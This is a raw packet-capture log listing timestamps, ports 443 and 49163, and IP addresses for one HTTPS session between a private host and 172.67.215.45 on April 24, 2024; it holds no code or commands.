Apr 24, 2024 10:24:11.491864920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.491883993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.492036104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.492085934 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.492086887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.492110014 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.492144108 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.492964983 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.492986917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.493011951 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.493022919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.493036985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.493081093 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.496258020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.496282101 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.496310949 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.496325016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.496337891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.498938084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.498963118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.498994112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.499006987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.499020100 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.501930952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.501952887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.501992941 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.502010107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.502022028 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.504512072 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.504538059 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.504575014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.504590034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.504604101 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.508085966 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.508112907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.508142948 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.508157015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.508188963 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.511390924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.511415958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.511449099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.511466026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.511480093 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.513293982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.513315916 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.513351917 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.513369083 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.513384104 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.516011000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.516036034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.516066074 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.516079903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.516093969 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.519767046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.519787073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.519820929 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.519834995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.519850016 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.521900892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.521925926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.521956921 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.521972895 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.521986961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.524441957 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.524462938 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.524492979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.524506092 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.524522066 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.524557114 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.528083086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.528111935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.528129101 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.528143883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.528168917 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.529942989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.529968977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.529989004 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.530004025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.530020952 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.530020952 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.530050993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.532346010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.532370090 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.532404900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.532419920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.532433987 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.537153959 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.537178993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.537199020 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.537214994 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.537244081 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.539652109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.539673090 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.539711952 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.539725065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.539743900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.543720961 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.543747902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.543776989 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.543791056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.543807983 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.546403885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.546426058 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.546461105 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.546477079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.546489954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.550610065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.550636053 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.550673008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.550685883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.550699949 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.551731110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.551753998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.551784992 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.551796913 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.551810980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.557816029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.557842970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.557879925 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.557895899 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.557908058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.560682058 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.560710907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.560744047 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.560760975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.560772896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.567632914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.567686081 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.567698002 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.567717075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.567754984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.567759991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.569380999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.569425106 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.569436073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.569447041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.569461107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.569487095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570574999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570599079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570625067 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570632935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570646048 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570673943 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570741892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570760965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570780993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570785046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.570796013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.570822001 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.571999073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572022915 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572047949 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.572056055 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572068930 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.572084904 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.572659969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572686911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572710991 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.572719097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.572731972 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.573991060 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.574014902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.574040890 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.574049950 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.574058056 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.574091911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.575170994 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.575195074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.575220108 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.575227022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.575237989 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.576564074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.576592922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.576617956 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.576627970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.576642990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.576742887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.578939915 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.578963041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.578991890 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.579003096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.579018116 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.581213951 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.581242085 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.581273079 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.581284046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.581299067 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.583615065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.583638906 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.583668947 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.583678961 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.583692074 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.583709002 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.586688042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.586726904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.586744070 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.586756945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.586770058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.586791039 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.594327927 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.607027054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.607060909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.607089996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.607105017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.607119083 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.607156038 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.608598948 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.608628988 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.608671904 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.608683109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.608704090 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.608748913 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.610764027 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.610789061 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.610815048 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.610826969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.610837936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.611335039 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.612571955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.612596035 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.612617970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.612627029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.612643957 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.612679958 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.615396023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.615444899 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.615458012 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.615468025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.615484953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.615535975 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.616398096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.616419077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.616450071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.616457939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.616472006 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.616523027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.619071960 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.619096041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.619126081 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.619136095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.619149923 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.620893002 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.620918036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.620946884 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.620959044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.620970964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.621011019 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.623286009 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.623308897 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.623337030 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.623348951 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.623362064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.624638081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.624661922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.624711990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.624711990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.624722004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.624744892 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.626836061 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.626857996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.626883030 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.626893044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.626908064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.626908064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.628365993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.628393888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.628427029 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.628437042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.628453970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.628453970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.630645037 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.630664110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.630697966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.630708933 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.630723953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.632492065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.632514000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.632544994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.632555962 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.632570982 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.633076906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.634856939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.634879112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.634910107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.634923935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.634934902 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.636847973 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.636871099 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.636890888 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.636903048 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.636917114 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.638350010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.638370037 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.638408899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.638425112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.638437986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.638454914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.641005993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.641028881 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.641056061 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.641067028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.641081095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.642736912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.642756939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.642791986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.642802954 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.642817974 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.644608021 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.644639015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.644670010 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.644680023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.644691944 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.646226883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.646250963 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.646282911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.646291971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.646311045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.646486998 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.648689032 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.648715019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.648735046 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.648751974 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.648762941 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.648796082 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.650202036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.650228977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.650245905 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.650254011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.650276899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.650306940 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.652638912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.652663946 CEST	443	49163	172.67.215.45	192.168.2.22
